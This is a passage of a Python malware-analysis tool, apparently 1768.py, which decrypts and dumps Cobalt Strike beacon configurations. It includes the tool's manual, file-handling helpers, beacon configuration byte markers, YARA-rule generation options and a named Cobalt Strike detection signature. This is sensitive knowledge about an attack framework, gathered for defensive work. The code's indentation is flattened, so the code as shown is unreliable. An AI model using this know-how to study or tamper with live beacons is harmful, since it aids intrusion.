2022/02/22: 0.0.12 added private key to 1768.json (provided by alexzorila); fix json output; pyzipper support
2022/04/15: 0.0.13 added option -H and IdentifyShellcode
2022/04/16: continue IdentifyShellcode
2022/05/20: 0.0.14 skipping 0x20 bytes
2022/07/31: 0.0.15 update class cAPIOptions
2022/08/17: added option --sanitycheck; refactored FinalTests
2022/08/20: 0.0.16 added output instructions to JSON output
2022/08/30: 0.0.17 added option -x
2023/04/02: updated man page
2023/04/03: 0.0.18 cleanup debugging
2023/04/27: 0.0.19 added LSFIF
Todo:
"""
import optparse
import sys
import os
import binascii
import random
import gzip
import collections
import glob
import textwrap
import re
import struct
import string
import math
import fnmatch
import json
import time
import hashlib
try:
import pyzipper as zipfile
except ImportError:
import zipfile
if sys.version_info[0] >= 3:
from io import BytesIO as DataIO
else:
from cStringIO import StringIO as DataIO
if sys.version_info[0] >= 3:
from io import StringIO
else:
from cStringIO import StringIO
try:
import pefile
import peutils
except ImportError:
print('Missing pefile and/or peutils Python module, please check if it is installed.')
sys.exit()
def PrintManual():
manual = r'''
Manual:
1768 Kelvin is the melting point of the metal cobalt.
This tool decrypts and dumps the configuration of Cobalt Strike Windows beacons (PE files), shellcode and memory dumps.
Use option -x to try all 256 xor keys for the configuration (not only 0x2e and 0x69).
Option -s (--select) can be used to select a particular configuration item (by decimal of hexadecimal number) for more information. For the moment, this option displays the complete item's data (hexadecimal in cleartext, encoded with 'i' (0x69) and encoded with '.' (0x2e). These hexadecimal values can be used to create detection rules, like YARA rules.
Option -l (--licenseid) is used to generate YARA rules to detect a beacon or shellcode with the given license ID. The id can be provided as an integer or an hexadecimal value (prefixed by 0x).
More than one license id can be provided: separate them by commas (,).
Each license id can be previded by a name for the license is (use : as a separator).
Example : 1768.py -l ATP_1:12345678,pentester_2:87654321
Option -c (--csv) is used to output the config parameters in CSV format.
Option -J (--jsonoutput) is used to output the config parameters in JSON format.
Use option -H to display the hashes of the analyzed file.
Option -S (--sanitycheck) performs a sanity check on the extracted configuration, and ignores the extracted configuration when it does not pass a sanity check.
The sanity check checks for the presence of config values 1 and 7, and check if their values are plausible:
1 -> known payload type
7 -> public key starts with 308
Option -V (--verbose) produces more output:
- verbosity for config values (like the private key for leaked keys)
- hex/ascii dump of found signatures
When a signature is found, the longest ASCII string in front of the signature (256 bytes span) is included, like this:
Sleep mask 64-bit 4.2 deobfuscation routine found: 0x122f12d31 (LSFIF: b'!#ALF:Y2V:Elastic/HKTL_CobaltStrike_Beacon_4_2_Decrypt')
LSFIF is abbreviation Longest String Found In Front.
A JSON file with name 1768.json placed in the same directory as 1768.py will be used to enhance fields with information, like the license-id field.
It reads one or more files or stdin. This tool is very versatile when it comes to handling files, later full details will be provided.
This Python script was first developed with Python 2.7 and tested with Python 2.7 and 3.7, now it is developed with Python 3.9 and tested with Python 3.9.
As stated at the beginning of this manual, this tool is very versatile when it comes to handling files. This will be explained now.
This tool reads files in binary mode. It can read files from disk, from standard input (stdin) and from "generated" files via the command line.
It can also partially read files (this is done with the cut operator).
If no file arguments are provided to this tool, it will read data from standard input (stdin). This way, this tool can be used in a piped chain of commands, like this:
oledump.py -s 4 -d sample.doc.vir | tool.py
When one or more file arguments are provided to this tool, it will read the files and process the content.
How the files are read, depends on the type of file arguments that are provided. File arguments that start with character @ or # have special meaning, and will be explained later.
If a file argument does not start with @ or #, it is considered to be a file on disk and the content will be read from disk.
If the file is not a compressed file, the binary content of the file is read from disk for processing.
Compressed files are solely recognized based on their extension: .zip and .gz.
It uses built-in Python module zipfile, unless module pyzipper is installed. Module pyzipper adds AES support, and can be installed with pip (Python 3 only).
If a file argument with extension .gz is provided, the tool will decompress the gzip file in memory and process the decompressed content. No checks are made to ensure that the file with extension .gz is an actual gzip compressed file.
If a file argument with extension .zip is provided and it contains a single file, the tool will extract the file from the ZIP file in memory and process the decompressed content. No checks are made to ensure that the file with extension .zip is an actual ZIP compressed file.
Password protected ZIP files can be processed too. The tool uses password 'infected' (without quotes) as default password. A different password can be provided using option --password.
Example:
tool.py sample.zip
To prevent the tool from decompressing .zip or .gz files, but to process the compressed file itself, use option --noextraction.
File arguments that start with character @ ("here files"), are read as text files that contain file arguments (one per line) to be processed.
For example, we take a text file with filename list.txt and following content:
sample-1.bin
sample-5.bin
sample-7.bin
When using this file (list.txt) in the following command:
tool.py @list.txt
the tool will process the following files: sample-1.bin, sample-5.bin and sample-7.bin.
A single @ character as filename is a here file read from stdin.
Wildcards are supported too. The classic *, ? and [] wildcard characters are supported. For example, use the following command to process all .exe and .dll files in the Windows directory:
tool.py C:\Windows\*.exe C:\Windows\*.dll
To prevent the tool from processing file arguments with wildcard characters or special initial characters (@ and #) differently, but to process them as normal files, use option --literalfilenames.
The content of folders can be processed too: use option --recursedir and provide folder names as argument. Wildcards and here files (for folder names) can be used too.
File arguments that start with character # have special meaning. These are not processed as actual files on disk (except when option --literalfilenames is used), but as file arguments that specify how to "generate" the file content.
File arguments that start with #, #h#, #b# or #e# are used to "generate" the file content.
Arguments that start with #c# are not file arguments, but cut operators (explained later).
Arguments that start with #f# are not file arguments, but flags (explained later).
Generating the file content with a # file argument means that the file content is not read from disk, but generated in memory based on the characteristics provided via the file argument.
When a file argument starts with # (and not with #h#, #b#, #e# or #c#), all characters that follow the # character specify the content of the generated file.
For example, file argument #ABCDE specifies a file containing exactly 5 bytes: ASCII characters A, B, C, D and E.
Thus the following command:
tool.py #ABCDE
will make the tool process data with binary content ABCDE. #ABCDE is not an actual file written on disk, but it is a notational convention to provide data via the command line.
Since this notation can not be used to specify all possible byte values, hexadecimal encoding (#h#) and BASE64 encoding (#b#) notation is supported too.
For example, #h#4142434445 is an hexadecimal notation that generates data ABCDE. Hexadecimal notation allows the generation of non-printable characters for example, like NULL bytes: #h#00
File argument #b#QUJDREU= is another example, this time BASE64 notation, that generates data ABCDE.
File arguments that start with #e# are a notational convention to use expressions to generate data. An expression is a single function/string or the concatenation of several functions/strings (using character + as concatenation operator).
Strings can be characters enclosed by single quotes ('example') or hexadecimal strings prefixed by 0x (0xBEEF).
4 functions are available: random, loremipsum, repeat and chr.
Function random takes exactly one argument: an integer (with value 1 or more). Integers can be specified using decimal notation or hexadecimal notation (prefix 0x).
The random function generates a sequence of bytes with a random value (between 0 and 255), the argument specifies how many bytes need to be generated. Remark that the random number generator that is used is just the Python random number generator, not a cryptographic random number generator.
Example:
tool.py #e#random(100)
will make the tool process data consisting of a sequence of 100 random bytes.
Function loremipsum takes exactly one argument: an integer (with value 1 or more).
The loremipsum function generates "lorem ipsum" text (fake latin), the argument specifies the number of sentences to generate.
Example: #e#loremipsum(2) generates this text:
Ipsum commodo proin pulvinar hac vel nunc dignissim neque eget odio erat magna lorem urna cursus fusce facilisis porttitor congue eleifend taciti. Turpis duis suscipit facilisi tristique dictum praesent natoque sem mi egestas venenatis per dui sit sodales est condimentum habitasse ipsum phasellus non bibendum hendrerit.
Function chr takes one argument or two arguments.
chr with one argument takes an integer between 0 and 255, and generates a single byte with the value specified by the integer.
chr with two arguments takes two integers between 0 and 255, and generates a byte sequence with the values specified by the integers.
For example #e#chr(0x41,0x45) generates data ABCDE.
Function repeat takes two arguments: an integer (with value 1 or more) and a byte sequence. This byte sequence can be a quoted string of characters (single quotes), like 'ABCDE' or an hexadecimal string prefixed with 0x, like 0x4142434445.
The repeat function will create a sequence of bytes consisting of the provided byte sequence (the second argument) repeated as many times as specified by the first argument.
For example, #e#repeat(3, 'AB') generates byte sequence ABABAB.
When more than one function needs to be used, the byte sequences generated by the functions can be concatenated with the + operator.
For example, #e#repeat(10,0xFF)+random(100) will generate a byte sequence of 10 FF bytes followed by 100 random bytes.
The cut argument (or cut operator) allows for the partial selection of the content of a file. This argument starts with #c# followed by a "cut-expression". Use this expression to "cut out" part of the content.
The cut-argument must be put in front of a file argument, like in this example:
tool.py #c#0:100l data.bin
With these arguments, tool.py will only process the first 100 bytes (0:100l) of file data.bin.
A cut argument is applied to all file arguments that follow it. Example:
tool.py #c#0:100l data-1.bin data-2.bin
With these arguments, tool.py will only process the first 100 bytes (0:100l) of file data-1.bin and the first 100 bytes file data-2.bin.
More than one cut argument can be used, like in this example:
tool.py #c#0:100l data-1.bin #c#0:200l data-2.bin
With these arguments, tool.py will only process the first 100 bytes (0:100l) of file data-1.bin and the first 200 bytes (0:200l) of file data-2.bin.
A cut-expression is composed of 2 terms separated by a colon (:), like this:
termA:termB
termA and termB can be:
- nothing (an empty string)
- a positive decimal number; example: 10
- an hexadecimal number (to be preceded by 0x); example: 0x10
- a case sensitive ASCII string to search for (surrounded by square brackets and single quotes); example: ['MZ']
- a case sensitive UNICODE string to search for (surrounded by square brackets and single quotes prefixed with u); example: [u'User']
- an hexadecimal string to search for (surrounded by square brackets); example: [d0cf11e0]
If termA is nothing, then the cut section of bytes starts with the byte at position 0.
If termA is a number, then the cut section of bytes starts with the byte at the position given by the number (first byte has index 0).
If termA is a string to search for, then the cut section of bytes starts with the byte at the position where the string is first found. If the string is not found, the cut is empty (0 bytes).
If termB is nothing, then the cut section of bytes ends with the last byte.
If termB is a number, then the cut section of bytes ends with the byte at the position given by the number (first byte has index 0).
When termB is a number, it can have suffix letter l. This indicates that the number is a length (number of bytes), and not a position.
termB can also be a negative number (decimal or hexademical): in that case the position is counted from the end of the file. For example, :-5 selects the complete file except the last 5 bytes.
If termB is a string to search for, then the cut section of bytes ends with the last byte at the position where the string is first found. If the string is not found, the cut is empty (0 bytes).
No checks are made to assure that the position specified by termA is lower than the position specified by termB. This is left up to the user.
Search string expressions (ASCII, UNICODE and hexadecimal) can be followed by an instance (a number equal to 1 or greater) to indicate which instance needs to be taken. For example, ['ABC']2 will search for the second instance of string 'ABC'. If this instance is not found, then nothing is selected.
Search string expressions (ASCII, UNICODE and hexadecimal) can be followed by an offset (+ or - a number) to add (or substract) an offset to the found instance. This number can be a decimal or hexadecimal (prefix 0x) value. For example, ['ABC']+3 will search for the first instance of string 'ABC' and then select the bytes after ABC (+ 3).
Finally, search string expressions (ASCII, UNICODE and hexadecimal) can be followed by an instance and an offset.
Examples:
This cut-expression can be used to dump the first 256 bytes of a PE file located inside the file content: ['MZ']:0x100l
This cut-expression can be used to dump the OLE file located inside the file content: [d0cf11e0]:
A flag argument starts with #f# and is passed on for all files that are provided after the flag argument. It can be used to change the behavior of the tool for certain files.
Example:
tool.py data-1.bin #f#-l data-2.bin
data-2.bin will be processed differently (using flag option -l) than file data-1.bin.
With option --jsoninput, the tool will parse the output produced by another tool using option --jsonoutput.
Example:
zipdump.py --jsonoutput Book1.xlsm | file-magic.py --jsoninput
[Content_Types].xml XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
_rels/.rels XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/_rels/workbook.xml.rels XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/workbook.xml XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/drawings/drawing1.xml XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/worksheets/_rels/sheet1.xml.rels XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/theme/theme1.xml XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
xl/styles.xml XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/worksheets/sheet1.xml XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/vbaProject.bin Composite Document File V2 Document, Cannot read section info
xl/drawings/vmlDrawing1.vml ASCII text, with CRLF line terminators
docProps/app.xml XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
xl/ctrlProps/ctrlProp1.xml XML 1.0 document, ASCII text, with CRLF line terminators
docProps/core.xml XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
In this example, zipdump is used to produce JSON data with the content of each file contained inside file Book1.xlsm (a ZIP container), which is then consumed by file-magic.py to identify (libmagic) the type of each file.
With option --ignoreprocessingerrors, the tool will continue processing the next file when an error occurs while processing the current file. Files that can not be opened will always be skipped to move to the next file.
Option --logfile direct the tool to create a logfile, and option --logcomment can be used to add a comment to the log file. The log file will contain metadata and a list of processed files, it does not contain processing results.
It is best to use this option when option --ignoreprocessingerrors is used, to have a record of file processing errors.
The lines are written to standard output, except when option -o is used. When option -o is used, the lines are written to the filename specified by option -o.
Filenames used with option -o starting with # have special meaning.
#c#example.txt will write output both to the console (stdout) and file example.txt.
#g# will write output to a file with a filename generated by the tool like this: toolname-date-time.txt.
#g#KEYWORD will write output to a file with a filename generated by the tool like this: toolname-KEYWORD-date-time.txt.
Use #p#filename to display execution progress.
To process several files while creating seperate output files for each input file, use -o #s#%f%.result *.
This will create output files with the name of the inputfile and extension .result.
There are several variables available when creating separate output files:
%f% is the full filename (with directory if present)
%b% is the base name: the filename without directory
%d% is the directory
%r% is the root: the filename without extension
%ru% is the root made unique by appending a counter (if necessary)
%e% is the extension
#h# is like the head command: only the first 10 lines will be outputed.
#t# is like the tail command: only the last 10 lines will be outputed.
Most options can be combined, like #ps# for example.
#l# is used for literal filenames: if the output filename has to start with # (#example.txt for example), use filename #l##example.txt for example.
'''
for line in manual.split('\n'):
print(textwrap.fill(line, 79))
DEFAULT_SEPARATOR = ','
QUOTE = '"'
START_CONFIG = b'\x00\x01\x00\x01\x00\x02'
START_CONFIG_I = b'ihihik'
START_CONFIG_DOT = b'././.,'
ERROR_NO_CONFIG = 'Error: config not found'
ERROR_SANITY_CHECK = 'Error: config does not pass sanity check'
def PrintError(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
#Convert 2 Bytes If Python 3
def C2BIP3(string):
if sys.version_info[0] > 2:
return bytes([ord(x) for x in string])
else:
return string
#Convert 2 String If Python 3
def C2SIP3(bytes):
if sys.version_info[0] > 2:
return ''.join([chr(byte) for byte in bytes])
else:
return bytes
#Convert 2 Integer If Python 2
def C2IIP2(data):
if sys.version_info[0] > 2:
return data
else:
return ord(data)
def P23Ord(value):
if type(value) == int:
return value
else:
return ord(value)
# CIC: Call If Callable
def CIC(expression):
if callable(expression):
return expression()
else:
return expression
# IFF: IF Function
def IFF(expression, valueTrue, valueFalse):
if expression:
return CIC(valueTrue)
else:
return CIC(valueFalse)
#-BEGINCODE cBinaryFile------------------------------------------------------------------------------
#import random
#import binascii
#import zipfile
#import gzip
#import sys
#if sys.version_info[0] >= 3:
# from io import BytesIO as DataIO
#else:
# from cStringIO import StringIO as DataIO
def LoremIpsumSentence(minimum, maximum):
words = ['lorem', 'ipsum', 'dolor', 'sit', 'amet', 'consectetur', 'adipiscing', 'elit', 'etiam', 'tortor', 'metus', 'cursus', 'sed', 'sollicitudin', 'ac', 'sagittis', 'eget', 'massa', 'praesent', 'sem', 'fermentum', 'dignissim', 'in', 'vel', 'augue', 'scelerisque', 'auctor', 'libero', 'nam', 'a', 'gravida', 'odio', 'duis', 'vestibulum', 'vulputate', 'quam', 'nec', 'cras', 'nibh', 'feugiat', 'ut', 'vitae', 'ornare', 'justo', 'orci', 'varius', 'natoque', 'penatibus', 'et', 'magnis', 'dis', 'parturient', 'montes', 'nascetur', 'ridiculus', 'mus', 'curabitur', 'nisl', 'egestas', 'urna', 'iaculis', 'lectus', 'maecenas', 'ultrices', 'velit', 'eu', 'porta', 'hac', 'habitasse', 'platea', 'dictumst', 'integer', 'id', 'commodo', 'mauris', 'interdum', 'malesuada', 'fames', 'ante', 'primis', 'faucibus', 'accumsan', 'pharetra', 'aliquam', 'nunc', 'at', 'est', 'non', 'leo', 'nulla', 'sodales', 'porttitor', 'facilisis', 'aenean', 'condimentum', 'rutrum', 'facilisi', 'tincidunt', 'laoreet', 'ultricies', 'neque', 'diam', 'euismod', 'consequat', 'tempor', 'elementum', 'lobortis', 'erat', 'ligula', 'risus', 'donec', 'phasellus', 'quisque', 'vivamus', 'pellentesque', 'tristique', 'venenatis', 'purus', 'mi', 'dictum', 'posuere', 'fringilla', 'quis', 'magna', 'pretium', 'felis', 'pulvinar', 'lacinia', 'proin', 'viverra', 'lacus', 'suscipit', 'aliquet', 'dui', 'molestie', 'dapibus', 'mollis', 'suspendisse', 'sapien', 'blandit', 'morbi', 'tellus', 'enim', 'maximus', 'semper', 'arcu', 'bibendum', 'convallis', 'hendrerit', 'imperdiet', 'finibus', 'fusce', 'congue', 'ullamcorper', 'placerat', 'nullam', 'eros', 'habitant', 'senectus', 'netus', 'turpis', 'luctus', 'volutpat', 'rhoncus', 'mattis', 'nisi', 'ex', 'tempus', 'eleifend', 'vehicula', 'class', 'aptent', 'taciti', 'sociosqu', 'ad', 'litora', 'torquent', 'per', 'conubia', 'nostra', 'inceptos', 'himenaeos']
sample = random.sample(words, random.randint(minimum, maximum))
sample[0] = sample[0].capitalize()
return ' '.join(sample) + '.'
def LoremIpsum(sentences):
return ' '.join([LoremIpsumSentence(15, 30) for i in range(sentences)])
STATE_START = 0
STATE_IDENTIFIER = 1
STATE_STRING = 2
STATE_SPECIAL_CHAR = 3
STATE_ERROR = 4
FUNCTIONNAME_REPEAT = 'repeat'
FUNCTIONNAME_RANDOM = 'random'
FUNCTIONNAME_CHR = 'chr'
FUNCTIONNAME_LOREMIPSUM = 'loremipsum'
def Tokenize(expression):
result = []
token = ''
state = STATE_START
while expression != '':
char = expression[0]
expression = expression[1:]
if char == "'":
if state == STATE_START:
state = STATE_STRING
elif state == STATE_IDENTIFIER:
result.append([STATE_IDENTIFIER, token])
state = STATE_STRING
token = ''
elif state == STATE_STRING:
result.append([STATE_STRING, token])
state = STATE_START
token = ''
elif char >= '0' and char <= '9' or char.lower() >= 'a' and char.lower() <= 'z':
if state == STATE_START:
token = char
state = STATE_IDENTIFIER
else:
token += char
elif char == ' ':
if state == STATE_IDENTIFIER:
result.append([STATE_IDENTIFIER, token])
token = ''
state = STATE_START
elif state == STATE_STRING:
token += char
else:
if state == STATE_IDENTIFIER:
result.append([STATE_IDENTIFIER, token])
token = ''
state = STATE_START
result.append([STATE_SPECIAL_CHAR, char])
elif state == STATE_STRING:
token += char
else:
result.append([STATE_SPECIAL_CHAR, char])
token = ''
if state == STATE_IDENTIFIER:
result.append([state, token])
elif state == STATE_STRING:
result = [[STATE_ERROR, 'Error: string not closed', token]]
return result
def ParseFunction(tokens):
if len(tokens) == 0:
print('Parsing error')
return None, tokens
if tokens[0][0] == STATE_STRING or tokens[0][0] == STATE_IDENTIFIER and tokens[0][1].startswith('0x'):
return [[FUNCTIONNAME_REPEAT, [[STATE_IDENTIFIER, '1'], tokens[0]]], tokens[1:]]
if tokens[0][0] != STATE_IDENTIFIER:
print('Parsing error')
return None, tokens
function = tokens[0][1]
tokens = tokens[1:]
if len(tokens) == 0:
print('Parsing error')
return None, tokens
if tokens[0][0] != STATE_SPECIAL_CHAR or tokens[0][1] != '(':
print('Parsing error')
return None, tokens
tokens = tokens[1:]
if len(tokens) == 0:
print('Parsing error')
return None, tokens
arguments = []
while True:
if tokens[0][0] != STATE_IDENTIFIER and tokens[0][0] != STATE_STRING:
print('Parsing error')
return None, tokens
arguments.append(tokens[0])
tokens = tokens[1:]
if len(tokens) == 0:
print('Parsing error')
return None, tokens
if tokens[0][0] != STATE_SPECIAL_CHAR or (tokens[0][1] != ',' and tokens[0][1] != ')'):
print('Parsing error')
return None, tokens
if tokens[0][0] == STATE_SPECIAL_CHAR and tokens[0][1] == ')':
tokens = tokens[1:]
break
tokens = tokens[1:]
if len(tokens) == 0:
print('Parsing error')
return None, tokens
return [[function, arguments], tokens]
def Parse(expression):
tokens = Tokenize(expression)
if len(tokens) == 0:
print('Parsing error')
return None
if tokens[0][0] == STATE_ERROR:
print(tokens[0][1])
print(tokens[0][2])
print(expression)
return None
functioncalls = []
while True:
functioncall, tokens = ParseFunction(tokens)
if functioncall == None:
return None
functioncalls.append(functioncall)
if len(tokens) == 0:
return functioncalls
if tokens[0][0] != STATE_SPECIAL_CHAR or tokens[0][1] != '+':
print('Parsing error')
return None
tokens = tokens[1:]
def InterpretInteger(token):
if token[0] != STATE_IDENTIFIER:
return None
try:
return int(token[1])
except:
return None
def Hex2Bytes(hexadecimal):
if len(hexadecimal) % 2 == 1:
hexadecimal = '0' + hexadecimal
try:
return binascii.a2b_hex(hexadecimal)
except:
return None
def InterpretHexInteger(token):
if token[0] != STATE_IDENTIFIER:
return None
if not token[1].startswith('0x'):
return None
bytes = Hex2Bytes(token[1][2:])
if bytes == None:
return None
integer = 0
for byte in bytes:
integer = integer * 0x100 + C2IIP2(byte)
return integer
def InterpretNumber(token):
number = InterpretInteger(token)
if number == None:
return InterpretHexInteger(token)
else:
return number
def InterpretBytes(token):
if token[0] == STATE_STRING:
return token[1]
if token[0] != STATE_IDENTIFIER:
return None
if not token[1].startswith('0x'):
return None
return Hex2Bytes(token[1][2:])
def CheckFunction(functionname, arguments, countarguments, maxcountarguments=None):
if maxcountarguments == None:
if countarguments == 0 and len(arguments) != 0:
print('Error: function %s takes no arguments, %d are given' % (functionname, len(arguments)))
return True
if countarguments == 1 and len(arguments) != 1:
print('Error: function %s takes 1 argument, %d are given' % (functionname, len(arguments)))
return True
if countarguments != len(arguments):
print('Error: function %s takes %d arguments, %d are given' % (functionname, countarguments, len(arguments)))
return True
else:
if len(arguments) < countarguments or len(arguments) > maxcountarguments:
print('Error: function %s takes between %d and %d arguments, %d are given' % (functionname, countarguments, maxcountarguments, len(arguments)))
return True
return False
def CheckNumber(argument, minimum=None, maximum=None):
number = InterpretNumber(argument)
if number == None:
print('Error: argument should be a number: %s' % argument[1])
return None
if minimum != None and number < minimum:
print('Error: argument should be minimum %d: %d' % (minimum, number))
return None
if maximum != None and number > maximum:
print('Error: argument should be maximum %d: %d' % (maximum, number))
return None
return number
def Interpret(expression):
functioncalls = Parse(expression)
if functioncalls == None:
return None
decoded = ''
for functioncall in functioncalls:
functionname, arguments = functioncall
if functionname == FUNCTIONNAME_REPEAT:
if CheckFunction(functionname, arguments, 2):
return None
number = CheckNumber(arguments[0], minimum=1)
if number == None:
return None
bytes = InterpretBytes(arguments[1])
if bytes == None:
print('Error: argument should be a byte sequence: %s' % arguments[1][1])
return None
decoded += number * bytes
elif functionname == FUNCTIONNAME_RANDOM:
if CheckFunction(functionname, arguments, 1):
return None
number = CheckNumber(arguments[0], minimum=1)
if number == None:
return None
decoded += ''.join([chr(random.randint(0, 255)) for x in range(number)])
elif functionname == FUNCTIONNAME_LOREMIPSUM:
if CheckFunction(functionname, arguments, 1):
return None
number = CheckNumber(arguments[0], minimum=1)
if number == None:
return None
decoded += LoremIpsum(number)
elif functionname == FUNCTIONNAME_CHR:
if CheckFunction(functionname, arguments, 1, 2):
return None
number = CheckNumber(arguments[0], minimum=1, maximum=255)
if number == None:
return None
if len(arguments) == 1:
decoded += chr(number)
else:
number2 = CheckNumber(arguments[1], minimum=1, maximum=255)
if number2 == None:
return None
if number < number2:
decoded += ''.join([chr(n) for n in range(number, number2 + 1)])
else:
decoded += ''.join([chr(n) for n in range(number, number2 - 1, -1)])
else:
print('Error: unknown function: %s' % functionname)
return None
return decoded
FCH_FILENAME = 0
FCH_DATA = 1
FCH_ERROR = 2
def FilenameCheckHash(filename, literalfilename):
if literalfilename:
return FCH_FILENAME, filename
elif filename.startswith('#h#'):
result = Hex2Bytes(filename[3:])
if result == None:
return FCH_ERROR, 'hexadecimal'
else:
return FCH_DATA, result
elif filename.startswith('#b#'):
try:
return FCH_DATA, binascii.a2b_base64(filename[3:])
except:
return FCH_ERROR, 'base64'
elif filename.startswith('#e#'):
result = Interpret(filename[3:])
if result == None:
return FCH_ERROR, 'expression'
else:
return FCH_DATA, result
elif filename.startswith('#'):
return FCH_DATA, C2BIP3(filename[1:])
else:
return FCH_FILENAME, filename
def AnalyzeFileError(filename):
PrintError('Error opening file %s' % filename)
PrintError(sys.exc_info()[1])
try:
if not os.path.exists(filename):
PrintError('The file does not exist')
elif os.path.isdir(filename):
PrintError('The file is a directory')
elif not os.path.isfile(filename):
PrintError('The file is not a regular file')
except:
pass
def CreateZipFileObject(arg1, arg2):
if 'AESZipFile' in dir(zipfile):
return zipfile.AESZipFile(arg1, arg2)
else:
return zipfile.ZipFile(arg1, arg2)
class cBinaryFile:
def __init__(self, filename, zippassword='infected', noextraction=False, literalfilename=False):
self.filename = filename
self.zippassword = zippassword
self.noextraction = noextraction
self.literalfilename = literalfilename
self.oZipfile = None
self.extracted = False
self.fIn = None
fch, data = FilenameCheckHash(self.filename, self.literalfilename)
if fch == FCH_ERROR:
line = 'Error %s parsing filename: %s' % (data, self.filename)
raise Exception(line)
try:
if self.filename == '':
if sys.platform == 'win32':
import msvcrt
msvcrt.setmode(sys.stdin.fileno(), os.O_BINARY)
self.fIn = sys.stdin
elif fch == FCH_DATA:
self.fIn = DataIO(data)
elif not self.noextraction and self.filename.lower().endswith('.zip'):
self.oZipfile = CreateZipFileObject(self.filename, 'r')
if len(self.oZipfile.infolist()) == 1:
self.fIn = self.oZipfile.open(self.oZipfile.infolist()[0], 'r', self.zippassword)
self.extracted = True
else:
self.oZipfile.close()
self.oZipfile = None
self.fIn = open(self.filename, 'rb')
elif not self.noextraction and self.filename.lower().endswith('.gz'):
self.fIn = gzip.GzipFile(self.filename, 'rb')
self.extracted = True
else:
self.fIn = open(self.filename, 'rb')
except:
AnalyzeFileError(self.filename)
raise
def close(self):
if self.fIn != sys.stdin and self.fIn != None:
self.fIn.close()
if self.oZipfile != None:
self.oZipfile.close()
def read(self, size=None):
try:
fRead = self.fIn.buffer
except:
fRead = self.fIn
if size == None:
return fRead.read()
else:
return fRead.read(size)
def Data(self):
data = self.read()
self.close()
return data
#-ENDCODE cBinaryFile--------------------------------------------------------------------------------
def File2Strings(filename):
try:
if filename == '':
f = sys.stdin
else:
f = open(filename, 'r')
except:
return None
try:
return map(lambda line:line.rstrip('\n'), f.readlines())
except:
return None
finally:
if f != sys.stdin:
f.close()
def File2String(filename):
try:
f = open(filename, 'rb')
except:
return None
try:
return f.read()
except:
return None
finally:
f.close()
def ProcessAt(argument):
if argument.startswith('@'):
strings = File2Strings(argument[1:])
if strings == None:
raise Exception('Error reading %s' % argument)
else:
return strings
else:
return [argument]
def Glob(filename):
filenames = glob.glob(filename)
if len(filenames) == 0:
return [filename]
else:
return filenames
class cExpandFilenameArguments():
def __init__(self, filenames, literalfilenames=False, recursedir=False, checkfilenames=False, expressionprefix=None, flagprefix=None):
self.containsUnixShellStyleWildcards = False
self.warning = False
self.message = ''
self.filenameexpressionsflags = []
self.expressionprefix = expressionprefix
self.flagprefix = flagprefix
self.literalfilenames = literalfilenames
expression = ''
flag = ''
if len(filenames) == 0:
self.filenameexpressionsflags = [['', '', '']]
elif literalfilenames:
self.filenameexpressionsflags = [[filename, '', ''] for filename in filenames]
elif recursedir:
for dirwildcard in filenames:
if expressionprefix != None and dirwildcard.startswith(expressionprefix):
expression = dirwildcard[len(expressionprefix):]
elif flagprefix != None and dirwildcard.startswith(flagprefix):
flag = dirwildcard[len(flagprefix):]
else:
if dirwildcard.startswith('@'):
for filename in ProcessAt(dirwildcard):
self.filenameexpressionsflags.append([filename, expression, flag])
elif os.path.isfile(dirwildcard):
self.filenameexpressionsflags.append([dirwildcard, expression, flag])
else:
if os.path.isdir(dirwildcard):
dirname = dirwildcard
basename = '*'
else:
dirname, basename = os.path.split(dirwildcard)
if dirname == '':
dirname = '.'
for path, dirs, files in os.walk(dirname):
for filename in fnmatch.filter(files, basename):
self.filenameexpressionsflags.append([os.path.join(path, filename), expression, flag])
else:
for filename in list(collections.OrderedDict.fromkeys(sum(map(self.Glob, sum(map(ProcessAt, filenames), [])), []))):
if expressionprefix != None and filename.startswith(expressionprefix):
expression = filename[len(expressionprefix):]
elif flagprefix != None and filename.startswith(flagprefix):
flag = filename[len(flagprefix):]
else:
self.filenameexpressionsflags.append([filename, expression, flag])
self.warning = self.containsUnixShellStyleWildcards and len(self.filenameexpressionsflags) == 0
if self.warning:
self.message = "Your filename argument(s) contain Unix shell-style wildcards, but no files were matched.\nCheck your wildcard patterns or use option literalfilenames if you don't want wildcard pattern matching."
return
if self.filenameexpressionsflags == [] and (expression != '' or flag != ''):
self.filenameexpressionsflags = [['', expression, flag]]
if checkfilenames:
self.CheckIfFilesAreValid()
def Glob(self, filename):
if not ('?' in filename or '*' in filename or ('[' in filename and ']' in filename)):
return [filename]
self.containsUnixShellStyleWildcards = True
return glob.glob(filename)
def CheckIfFilesAreValid(self):
valid = []
doesnotexist = []
isnotafile = []
for filename, expression, flag in self.filenameexpressionsflags:
hashfile = False
try:
hashfile = FilenameCheckHash(filename, self.literalfilenames)[0] == FCH_DATA
except:
pass
if filename == '' or hashfile:
valid.append([filename, expression, flag])
elif not os.path.exists(filename):
doesnotexist.append(filename)
elif not os.path.isfile(filename):
isnotafile.append(filename)
else:
valid.append([filename, expression, flag])
self.filenameexpressionsflags = valid
if len(doesnotexist) > 0:
self.warning = True
self.message += 'The following files do not exist and will be skipped: ' + ' '.join(doesnotexist) + '\n'
if len(isnotafile) > 0:
self.warning = True
self.message += 'The following files are not regular files and will be skipped: ' + ' '.join(isnotafile) + '\n'
def Filenames(self):
if self.expressionprefix == None:
return [filename for filename, expression, flag in self.filenameexpressionsflags]
else:
return self.filenameexpressionsflags
def CheckJSON(stringJSON):
try:
object = json.loads(stringJSON)
except:
print('Error parsing JSON')
print(sys.exc_info()[1])
return None
if not isinstance(object, dict):
print('Error JSON is not a dictionary')
return None
if not 'version' in object:
print('Error JSON dictionary has no version')
return None
if object['version'] != 2:
print('Error JSON dictionary has wrong version')
return None
if not 'id' in object:
print('Error JSON dictionary has no id')
return None
if object['id'] != 'didierstevens.com':
print('Error JSON dictionary has wrong id')
return None
if not 'type' in object:
print('Error JSON dictionary has no type')
return None
if object['type'] != 'content':
print('Error JSON dictionary has wrong type')
return None
